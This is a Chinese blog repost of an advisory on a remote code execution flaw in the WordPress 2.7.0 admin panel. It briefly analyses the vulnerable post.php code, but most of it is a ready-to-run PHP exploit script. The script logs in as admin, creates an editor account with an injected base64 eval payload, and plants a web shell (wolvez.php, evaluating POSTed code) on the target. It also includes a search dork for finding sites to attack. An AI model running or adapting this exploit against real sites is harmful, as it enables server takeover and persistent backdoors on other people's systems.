包罗万象--好东西要收藏--共享无限

Wordpress 2.7.0 admin remote code execution vulnerability

by Ryat[puretot]  mail: puretot at gmail dot com  team: http://www.80vul.com  date: 2008-12-18    一分析:    这个漏洞出在后台:(      wp-admin/post.php        if ( current_user_can('edit_post', $post_ID) ) {          if ( $last = wp_check_post_lock( $post->ID ) ) {              $last_user = get_userdata( $last );              $last_user_name = $last_user ? $last_user->display_name : __('Somebody');              $message = sprintf( __( 'Warning: %s is currently editing this post' ), wp_specialchars( $last_user_name ) );              $message = str_replace( "'", "\'", "<div class='error'><p>$message</p></div>" );              //提交\'经过此处代码处理后变为\\' :)              add_action('admin_notices', create_function( '', "echo '$message';" ) );              //利用上面的方法闭合echo后面的单引号,就可以执行命令了[ex:\';phpinfo();\'];另外这个地方也可以利用create_function函数自身的一个bug[1]来执行命令[ex:\';}phpinfo();//]          } else {              wp_set_post_lock( $post->ID );              wp_enqueue_script('autosave');          }      }          2.EXP:      #!/usr/bin/php  <?php    print_r('  +---------------------------------------------------------------------------+  Wordpress 2.7.0 remote code execution exploit  by puret_t  mail: puretot at gmail dot com  team: http://www.wolvez.org  site: http://www.80vul.com  dork: "powered by WordPress"  +---------------------------------------------------------------------------+  ');  /**   * works regardless of php.ini settings   */  if ($argc < 6) {      print_r('  +---------------------------------------------------------------------------+  Usage: php '.$argv[0].' host path user pass post  host:      target server (ip/hostname)  path:      path to wordpress  user:      admin login username  pass:      admin login password  post:      the available post id  Example:  php '.$argv[0].' localhost /wp/ admin 123456 1  +---------------------------------------------------------------------------+  ');      exit;  }    error_reporting(7);  ini_set('max_execution_time', 0);    $host = $argv[1];  $path = $argv[2];  $user = $argv[3];  $pass = $argv[4];  $post = $argv[5];    $shellcode = '\\\';eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy93b2x2ZXoucGhwJywndysnKSwnPD9ldmFsKCRfUE9TVFtjXSk7Pz5wdXJldF90Jyk7));\\\'';  //$shellcode = '\\\';}eval(base64_decode(ZnB1dHMoZm9wZW4oJy4uL3dwLWNvbnRlbnQvcGx1Z2lucy93b2x2ZXoucGhwJywndysnKSwnPD9ldmFsKCRfUE9TVFtjXSk7Pz5wdXJldF90Jyk7));//';  $shell = 'http://'.$host.$path.'wp-content/plugins/wolvez.php';  /**   * wolvez.php has this code:   * <?eval($_POST[c])?>   */  $url = $path.'wp-login.php';  $cmd = 'log='.urlencode($user).'&pwd='.urlencode($pass);  $resp = send();  preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/', $resp, $admin_cookie);    if (!$admin_cookie)      exit("Exploit Failed!\n");        $url = $path.'wp-admin/user-new.php#add-new-user';  $cmd = '';  $resp = send($admin_cookie[1]);  preg_match('/name="_wpnonce"\svalue="([a-z0-9]{10})"/', $resp, $_wpnonce);    if (!$_wpnonce)      exit("Exploit Failed!\n");    $cmd = '_wpnonce='.$_wpnonce[1].'&action=adduser&user_login=ryat&email=ryat%40ryat.com&pass1=123456&pass2=123456&role=editor&display_name='.$shellcode;  $resp = send($admin_cookie[1]);    if (strpos($resp, 'users.php?usersearch=ryat&update=add#user') === false)      exit("Exploit Failed!\n");    $url = $path.'wp-login.php';  $cmd = 'log=ryat&pwd=123456';  $resp = send();  preg_match('/Set-Cookie:\s(wordpress_[a-f0-9]+=[a-zA-Z0-9%]+);/', $resp, $editor_cookie);    if (!$editor_cookie)      exit("Exploit Failed!\n");    $url = $path.'wp-admin/post.php?action=edit&post='.$post;  $cmd = '';  send($editor_cookie[1]);  send($admin_cookie[1]);    if (strpos(file_get_contents($shell), 'puret_t') !== false)      exit("Expoilt Success!\nView Your shell:\t$shell\n");  else      exit("Exploit Failed!\n");    function send($cookie = '')  {      global $host, $path, $url, $cmd;        $data = "POST $url  HTTP/1.1\r\n";      $data .= "Accept: */*\r\n";      $data .= "Accept-Language: zh-cn\r\n";      $data .= "Referer: http://$host$path\r\n";      $data .= "Content-Type: application/x-www-form-urlencoded\r\n";      $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";      $data .= "Host: $host\r\n";      $data .= "Content-Length: ".strlen($cmd)."\r\n";      $data .= "Connection: Close\r\n";      $data .= "Cookie: $cookie\r\n\r\n";      $data .= $cmd;        $fp = fsockopen($host, 80);      fputs($fp, $data);        $resp = '';        while ($fp && !feof($fp))          $resp .= fread($fp, 1024);        return $resp;  }    ?>  

我的QQ空间

kmeleon.js及pref.js配置解释

K-MeleonCCF ME目录下的defaults\pref\kmeleon.js保存了K-Meleon...